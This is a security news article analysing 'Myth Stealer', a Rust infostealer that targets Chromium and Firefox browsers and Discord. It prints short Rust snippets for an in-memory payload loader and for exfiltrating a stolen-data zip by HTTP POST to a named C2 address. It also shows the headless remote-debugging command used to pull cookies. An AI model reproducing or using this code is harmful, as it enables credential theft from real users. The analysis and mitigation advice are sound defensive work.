Rust-Based ‘Myth Stealer’ Hits Chromium Browsers, Harvests Passwords & Cookies

A new and rapidly evolving malware threat, Myth Stealer, written entirely in Rust, is actively targeting users of Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, and Opera alongside Gecko-based browsers like Firefox.

Discovered by Trellix Advanced Research Center, this infostealer employs novel evasion techniques and highly modular code to steal sensitive user data, including passwords, cookies, credit card details, and more.

Originally distributed as a free trial on Telegram in late 2024, Myth Stealer has since transformed into a paid subscription service, facilitating cybercrime at scale.

Technical Dissection: Evasion, Extraction, and Exfiltration

Loader and Fake Window Mechanism

Upon execution, Myth Stealer displays a convincing fake window using Rust crates like native-windows-gui, egui, or native_dialog to trick users into believing a legitimate application is running.

Simultaneously, the loader decrypts the main stealer payload in memory using custom algorithms or cryptographic routines (XOR/AES, leveraging crates such as include-crypt). The decrypted payload is a 64-bit Rust DLL with key exports (DllMain and bz_internal_error), executed stealthily with the memexec crate.

Code Excerpt: Loader Decrypting and Executing DLL

rustuse include_crypt::decrypt_aes;
let encrypted_bytes = include_bytes!("stealer_payload.aes");
let key = b"supersecretkey!"; // Key is hardcoded or obfuscated
let decrypted_payload = decrypt_aes(encrypted_bytes, key);
memexec::exec(&decrypted_payload); // Execute DLL in-memory

Anti-Analysis and Obfuscation

Myth Stealer uses the obfstr crate for string obfuscation, hindering static analysis and signature-based detection. For example, strings are XOR’d and resolved at runtime via custom functions. Sandboxing checks are performed by scanning for known forensic usernames and VM-related system files. If detected, the malware self-terminates, thwarting sandbox analysis.

Obfstr Deobfuscation Workflow (Reverse Engineering)

• Locate calls to obfstr::xref::inner.
• Extract operands and re-emulate the XOR/decryption logic.
• Patch binary with recovered strings for rapid static analysis.

Data Harvesting: Passwords, Cookies, Clipboard

Myth Stealer targets a broad spectrum of browsers and apps:

• Chromium browsers (Chrome, Edge, Opera, Brave, Vivaldi, etc.)
• Gecko browsers (Firefox)
• Discord and its variants

For Chromium, it leverages the browser’s remote debugging mode to extract cookies:

textchromium.exe --remote-debugging-port=9222 --user-data-dir=<victimdir> --headless

Once privileged, it attempts to elevate using the Windows API ShellExecuteW with runas. Clipboard hijacking is also implemented to intercept and replace cryptocurrency wallet addresses in flight, redirecting funds to attacker-controlled wallets.

Data Exfiltration and Persistence

Harvested data is packed into a zip file, reversed at the byte level, and sent via HTTP POST requests to a C2 server (example: 185[.]224[.]3[.]219:8080/api/send). Each request includes custom headers (myth-key/key), further shrouding communications.

Zip File Exfiltration Logic

rustlet mut zip_file = fs::read("harvested_data.zip")?;
zip_file.reverse(); // Simple byte reversal for obfuscation
let client = reqwest::blocking::Client::new();
let res = client.post("http://185.224.3.219:8080/api/send")
    .header("key", "unique-myth-key")
    .body(zip_file)
    .send()?;

Data points exfiltrated include:

• Saved passwords, cookies, autofills, credit cards
• Browser session tokens
• Screenshots after fetching the external IP with a GET request to ipify.org

The malware maintains persistence by copying itself to AppData\Roaming\winlnk.exe and creating a .lnkk shortcut in the startup directory, registered via custom registry keys.

The Growing Threat: Rapid Adaptation and Defensive Measures

The developers behind Myth Stealer are running a well-organized operation, offering subscriptions via cryptocurrency and maintaining rapid update cycles to bypass antivirus solutions. Updates are announced via Telegram channels, while stolen credentials are traded in dark marketplaces.

Mitigation Recommendations:

• Monitor for suspicious processes utilizing browser debugging ports.
• Audit startup folders and registry for unauthorized executables and .lnkk entries.
• Employ endpoint detection with behavioral analysis to catch in-memory and obfuscated threats.

Myth Stealer exemplifies a new wave of Rust-based malware: robust, evasive, and modular—posing a formidable challenge for defenders across the globe. As browser threats escalate, proactive threat hunting and consistent user awareness remain essential.

Indicators of compromise